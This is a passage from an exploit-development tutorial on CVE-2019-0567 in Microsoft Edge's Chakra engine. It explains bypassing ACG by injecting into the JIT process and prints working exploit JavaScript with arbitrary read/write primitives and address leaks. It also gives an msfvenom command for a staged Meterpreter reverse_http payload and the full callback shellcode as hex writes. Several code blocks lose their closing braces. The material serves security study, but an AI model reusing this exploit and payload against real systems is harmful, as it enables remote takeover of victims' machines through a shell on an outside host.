  1. DuplicateHandle let’s you decide in what process the handle you want to duplicate exists. We tell DuplicateHandle that we want to duplicate a handle within the JIT process, using the low-permission PROCESS_DUP_HANDLE handle we have leaked from s_jitManager.
  2. We then tell DuplicateHandle the handle we want to duplicate within the JIT server is a GetCurrentProcess pseudo handle. This handle has PROCESS_ALL_ACCESS
  3. Although GetCurrentProcess returns a handle only usable by the process which called it, DuplicateHandle will perform a conversion under the hood to convert this to an actual handle which other processes can use
  4. Lastly, we tell DuplicateHandle we want a real handle to the JIT server, which we can use from the content process, with PROCESS_ALL_ACCESS permissions via the DUPLICATE_SAME_ACCESS flag which will tell DuplicateHandle to duplicate the handle with the same permissions as the pseudo handle (which is PROCESS_ALL_ACCESS).

Again, just keep re-reading over this and thinking about it logically. If you still have questions, feel free to email me. It can get confusing pretty quickly (at least to me).

Now that we are armed with the above information, it is time to start outline our exploitation plan.

Exploitation Plan 2.0

Let’s briefly take a second to rehash where we are at:

  1. We have an ASLR bypass and we know the layout of memory
  2. We can read/write anywhere in memory as much or as little as we want
  3. We can direct program execution to wherever we want in memory
  4. We know where the stack is and can force Edge to start executing our ROP chain

However, we know the pesky mitigations of ACG, CIG, and β€œno child processes” are still in our way. We can’t just execute our payload because we can’t make our payload as executable. So, with that said, the first option one could take is using a pure data-only attack. We could programmatically, via ROP, build out a reverse shell. This is very cumbersome and could take thousands of ROP gadgets. Although this is always a viable alternative, we want to detonate actual shellcode somehow. So, the approach we will take is as follows:

  1. Abuse CVE-2017-8637 to obtain a PROCESS_ALL_ACCESS handle to the JIT process
  2. ACG is disabled within the JIT process. Use our ability to execute a ROP chain in the content process to write our payload to the JIT process
  3. Execute our payload within the JIT process to obtain shellcode execution (essentially perform process injection to inject a payload to the JIT process where ACG is disabled)

To break down how we will actually accomplish step 2 in even greater detail, let’s first outline some stipulations about processes protected by ACG. We know that the content process (where our exploit will execute) is protected by ACG. We know that the JIT server is not protected by ACG. We already know that a process not protected by ACG is allowed to inject into a process that is protected by ACG. We clearly see this with the out-of-process JIT architecture of Edge. The JIT server (not protected by ACG) injects code into the content process (protected by ACG) - this is expected behavior. However, what about a injection from a process that is protected by ACG into a process that is not protected by ACG (e.g. injection from the content process into the JIT process, which we are attempting to do)?

This is actually prohibited (with a slight caveat). A process that is protected by ACG is not allowed to directly inject RWX memory and execute it within a process not protected by ACG. This makes sense, as this stipulation β€œprotects” against an attacker compromising the JIT process (ACG disabled) from the content process (ACG enabled). However, we mentioned the stipulation is only that we cannot directly embed our shellcode as RWX memory and directly execute it via a process injection call stack like VirtualAllocEx (allocate RWX memory within the JIT process) -> WriteProcessMemory -> CreateRemoteThread (execute the RWX memory in the JIT process). However, there is a way we can bypass this stipulation.

Instead of directly allocating RWX memory within the JIT process (from the content process) we could instead just write a ROP chain into the JIT process. This doesn’t require RWX memory, and only requires RW memory. Then, if we could somehow hijack control-flow of the JIT process, we could have the JIT process execute our ROP chain. Since ACG is disabled in the JIT process, our ROP chain could mark our shellcode as RWX instead of directly doing it via VirtualAllocEx! Essentially, our ROP chain would just be a β€œtraditional” one used to bypass DEP in the JIT process. This would allow us to bypass ACG! This is how our exploit chain would look:

  1. Abuse CVE-2017-8637 to obtain a PROCESS_ALL_ACCESS handle to the JIT process (this allows us to invoke memory operations on the JIT server from the content process)
  2. Allocate memory within the JIT process via VirtualAllocEx and the above handle
  3. Write our final shellcode (a reflective DLL from Meterpreter) into the allocation (our shellcode is now in the JIT process as RW)
  4. Create a thread within the JIT process via CreateRemoteThread, but create this thread as suspended so it doesn’t execute and have the start/entry point of our thread be a ret ROP gadget
  5. Dump the CONTEXT structure of the thread we just created (and now control) in the JIT process via GetThreadContext to retrieve its stack pointer (RSP)
  6. Use WriteProcessMemory to write the β€œfinal” ROP chain into the JIT process by leveraging the leaked stack pointer (RSP) of the thread we control in the JIT process from our call to GetThreadContext. Since we know where the stack is for our thread we created, from GetThreadContext, we can directly write a ROP chain to it with WriteProcessMemory and our handle to the JIT server. This ROP chain will mark our shellcode, which we already injected into the JIT process, as RWX (this ROP chain will work just like any traditional ROP chain that calls VirtualProtect)
  7. Update the instruction pointer of the thread we control to return into our ROP chains
  8. Call ResumeThread. This call will kick off execution of our thread, which has its entry point set to a return routine to start executing off of the stack, where our ROP chain is
  9. Our ROP chain will mark our shellcode as RWX and will jump to it and execute it

Lastly, I want to quickly point out the old Advanced Windows Exploitation syllabus from Offensive Security. After reading the steps outlined in this syllabus, I was able to formulate my aforementioned exploitation path off of the ground work laid here. As this blog post continues on, I will explain some of the things I thought would work at first and how the above exploitation path actually came to be. Although the syllabus I read was succinct and concise, I learned as I developing my exploit some additional things Control Flow Guard checks which led to many more ROP chains than I would have liked. As this blog post goes on, I will explain my thought process as to what I thought would work and what actually worked.

If the above steps seem a bit confusing - do not worry. We will dedicate a section to each concept in the rest of the blog post. You have gotten through a wall of text and, if you have made it to this point, you should have a general understanding of what we are trying to accomplish. Let’s now start implementing this into our exploit. We will start with our shellcode.


The first thing we need to decide is what kind of shellcode we want to execute. What we will do is store our shellcode in the .data section of chakra.dll within the content process. This is so we know its location when it comes time to inject it into the JIT process. So, before we begin our ROP chain, we need to load our shellcode into the content process so we can inject it into the JIT process. A typical example of a reverse shell, on Windows, is as follows:

  1. Create an instance of cmd.exe
  2. Using the socket library of the Windows API to put the I/O for cmd.exe on a socket, making the cmd.exe session remotely accessible over a network connection.

We can see this within the Metasploit Framework

Here is the issue - within Edge, we know there is a β€œno child processes” mitigation. Since a reverse shell requires spawning an instance of cmd.exe from the code calling it (our exploit), we can’t just use a normal reverse shell. Another way we could load code into the process space is through a DLL. However, remember that even though ACG is disabled in the JIT process, the JIT process still has Code Integrity Guard (CIG) enabled - meaning we can’t just use our payload to download a DLL to disk and then load it with LoadLibraryA. However, let’s take a further look at CIG’s documentation. Specifically regarding the Mitigation Bypass and Bounty for Defense Terms. If we scroll down to the β€œCode integrity mitigations”, we can take a look at what Microsoft deems to be out-of-scope.

If the image above is hard to view, open it in a new tab. As we can see Microsoft says that β€œin-memory injection” is out-of-scope of bypassing CIG. This means Microsoft knows this is an issue that CIG doesn’t address. There is a well-known technique known as reflective DLL injection where an adversary can use pure shellcode (a very large blob of shellcode) in order to load an entire DLL (which is unsigned by Microsoft) in memory, without ever touching disk. Red teamers have beat this concept to death, so I am not going to go in-depth here. Just know that we need to use reflective DLL because we need a payload which doesn’t spawn other processes.

Most command-and-control frameworks, like the one we will use (Meterpreter), use reflective DLL for their post-exploitation capabilities. There are two ways to approach this - staged and stageless. Stageless payloads will be a huge blob of shellcode that not only contain the DLL itself, but a routine that injects that DLL into memory. The other alternative is a staged payload - which will use a small first-stage shellcode which calls out to a command-and-control server to fetch the DLL itself to be injected. For our purposes, we will be using a staged reflective DLL for our shellcode.

To be more simple - we will be using the windows/meterpreter/x64/reverse_http payload from Metasploit. Essentially you can opt for any shellcode to be injected which doesn’t fork a new process.

The shellcode can be generated as follows: msfvenom -p windows/x64/meterpreter/reverse_http LHOST=YOUR_SERVER_IP LPORT=443 -f c

What I am about to explain next is (arguably) the most arduous part of this exploit. We know that in our exploit JavaScript limits us to 32-bit boundaries when reading and writing. So, this means we have to write our shellcode 4 bytes at a time. So, in order to do this, we need to divide up our exploit into 4-byte β€œsegments”. I did this manually, but later figured out how to slightly automate getting the shellcode correct.

To β€œautomate” this, we first need to get our shellcode into one contiguous line. Save the shellcode from the msfvenom output in a file named shellcode.txt.

Once the shellcode is in shellcode.txt, we can use the following one liner:

awk '{printf "%s""",$0}' shellcode.txt | sed 's/"//g' | sed 's/;//g' | sed 's/$/0000/' |  sed -re 's/\\x//g1' | fold -w 2 | tac | tr -d "\n" | sed 's/.\{8\}/& /g' | awk '{ for (i=NF; i>1; i--) printf("%s ",$i); print $1; }' | awk '{ for(i=1; i<=NF; i+=2) print $i, $(i+1) }' | sed 's/ /, /g' | sed 's/[^ ]* */0x&/g' | sed 's/^/write64(chakraLo+0x74b000+countMe, chakraHigh, /' | sed 's/$/);/' | sed 's/$/\ninc();/'

This will take our shellcode and divide it into four byte segments, remove the \x characters, get them in little endian format, and put them in a format where they will more easily be ready to be placed into our exploit.

Your output should look something like this:

write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000d5ff, );

Notice at the last line, we are missing 4 bytes. We can add some NULL padding (NULL bytes don’t affect us because we aren’t dealing with C-style strings). We need to update our last line as follows:

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);

Let’s take just one second to breakdown why the shellcode is formatted this way. We can see that our write primitive starts writing this shellcode to chakra_base + 0x74b000. If we take a look at this address within WinDbg we can see it is β€œempty”.

This address comes from the .data section of chakra.dll - meaning it is RW memory that we can write our shellcode to. As we have seen time and time again, the !dh chakra command can be used to see where the different headers are located at. Here is how our exploit looks now:

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));

    // Counter
    let countMe = 0;

    // Helper function for counting
    function inc()

    // Shellcode (will be executed in JIT process)
    // msfvenom -p windows/x64/meterpreter/reverse_http LHOST= LPORT=443 -f c
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    0:020> u chakra+0xd4a73
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
			document.write("[+] Found our return address on the stack!");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));

            // Break the loop

        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;

	// alert() for debugging

	// Corrupt the return address to control RIP with 0x4141414141414141
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);

As we can clearly, see, we use our write primitive to write 1 QWORD at a time our shellcode (this is why we have countMe+=0x8;. Let’s run our exploit, the same way we have been doing. When we run this exploit, an alert dialogue should occur just before the stack address is overwritten. When the alert dialogue occurs, we can debug the content process (we have already seen how to find this process via Process Hacker, so I won’t continually repeat this).

After our exploit has ran, we can then examine where our shellcode should have been written to: chakra_base + 0x74b000.

If we cross reference the disassembly here with the Metasploit Framework we can see that Metasploit staged-payloads will use the following stub to start execution.

As we can see, our injected shellcode and the Meterpreter shellcode both start with cld instruction to flush any flags and a stack alignment routine which ensure the stack is 10-byte aligned (Windows __fastcall requires this). We can now safely assume our shellcode was written properly to the .data section of chakra.dll within the content process.

Now that we have our payload, which we will execute at the end of our exploit, we can begin the exploitation process by starting with our β€œfinal” ROP chain.

VirtualProtect ROP Chain

Let me caveat this section by saying this ROP chain we are about to develop will not be executed until the end of our exploit. However, it will be a moving part of our exploit going forward so we will go ahead and β€œknock it out now”.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

